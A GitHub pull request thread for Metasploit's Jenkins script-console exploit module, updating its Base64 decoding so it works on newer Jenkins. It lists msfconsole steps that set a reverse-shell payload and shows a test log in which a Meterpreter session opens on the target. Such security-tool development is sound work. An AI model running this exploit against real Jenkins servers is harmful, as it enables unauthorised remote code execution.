Update jenkins_script_console.rb
rapid7/metasploit-framework pull request #16750
Opened 2022-07-06 13:18 UTC by bojanisc

Modern Java disabled the sun.misc.BASE64Decoder class so exploit will fail on any newer version of Jenkins.
The java.util.Base64 class should be used now; the change has been confirmed to work with the latest version of Jenkins (the current exploit silently fails).

List the steps needed to make sure this thing works

- [X] Start `msfconsole`
- [X] `use exploit/multi/http/jenkins_script_console`
- [X] `set PAYLOAD linux/x86/shell/reverse_tcp
- [X] `set RHOSTS ...`
- [X] `set RPORT`
- [X] `set username admin`
- [X] `set API_TOKEN xxx`
- [X] run

2022-07-06 13:25 UTC, gwillcox-r7 requested changes
Overall looks good to me but see point about removing now non-used variable.

2022-07-06 17:07 UTC, bojanisc commented on modules/exploits/multi/http/jenkins_script_console.rb
> +    jcode = "byte[] #{decoded_bytes} = Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\");\n"
Ahh indeed, we can get rid of the decoder variable it's not used at all.
Not sure what's the easiest way to change that with this request now, my Git-fu is not that strong :)

2022-07-06 18:37 UTC, gwillcox-r7 approved these changes

2022-07-06 18:39 UTC, gwillcox-r7 commented
Code changes look good to me but this will still need a run against a Jenkins server to make sure the changes work in a real world case, just to ensure the new code holds up in testing. Otherwise looks good, nice work @bojanisc!

2022-07-07 14:52 UTC, smcintyre-r7 commented on modules/exploits/multi/http/jenkins_script_console.rb
> +    jcode = "byte[] #{decoded_bytes} = Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\");\n"
So the new method using `Base64.getDecoder` requires Java version 1.8. This module has been around since 2014, so we want to make sure that the new technique is going to be backwards compatible lest older versions of Jenkins become incompatible with this exploit.

The best way to handle this would be to figure out the correct decoder to use at runtime so the user doesn't need to worry about it. Alternatively either a target or OptEnum could be used to specify the version, though the user would have to figure it out.

Could also look at removing base64 encoding altogether and properly escaping the java string literal but that is probably the most complicated solution.

2022-07-07 17:57 UTC, gwillcox-r7 commented on modules/exploits/multi/http/jenkins_script_console.rb
> +    jcode = "byte[] #{decoded_bytes} = Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\");\n"
Looking at https://serverfault.com/questions/488745/which-java-version-should-i-run-jenkins-with shows that at a minimum for a while JDK 1.5 was required, and then in 2017 they published https://jenkins.io/blog/2017/01/17/Jenkins-is-upgrading-to-Java-8/ which stated they would be requiring a minimum of Java 8.

Long and short of it is that we shouldn't expect `Base64.getDecoder` to exist as whilst this will be fine for newer versions of Jenkins, it looks like its very possible that older versions wouldn't have this method. In particular OpenJDK 1.5 seems to be based off of Java 5 which won't have this method in it.

Spencer's suggestion to try detect the version of Java on the system and then use the corresponding method would probably be the best here.

2022-08-31 21:58 UTC, space-r7 commented
Successfully tested and changes look good to me:

```
msf6 exploit(multi/http/jenkins_script_console) > run

[*] Started reverse TCP handler on 192.168.140.5:4444 
[*] Checking access to the script console
[*] Authenticating with token...
[*] Using CSRF token: '08b53cc76c4f72a484ebafcf8720b5f9' (Jenkins-Crumb style)
[*] 127.0.0.1:5555 - Sending Linux stager...
[*] Sending stage (989032 bytes) to 192.168.140.5
[!] Deleting /tmp/tlVuL payload file
[*] Meterpreter session 1 opened (192.168.140.5:4444 -> 192.168.140.5:63040) at 2022-08-31 16:57:07 -0500

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 9.1 (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```

2022-08-31 22:01 UTC, merged

2022-08-31 22:05 UTC, space-r7 commented
## Release Notes

This updates the `exploit/multi/http/jenkins_script_console` module to use the decoder from the `java.util.Base64` class in place of the now-deprecated decoder from the `sun.misc.BASE64Decoder` class, enabling exploitation of newer Jenkins versions.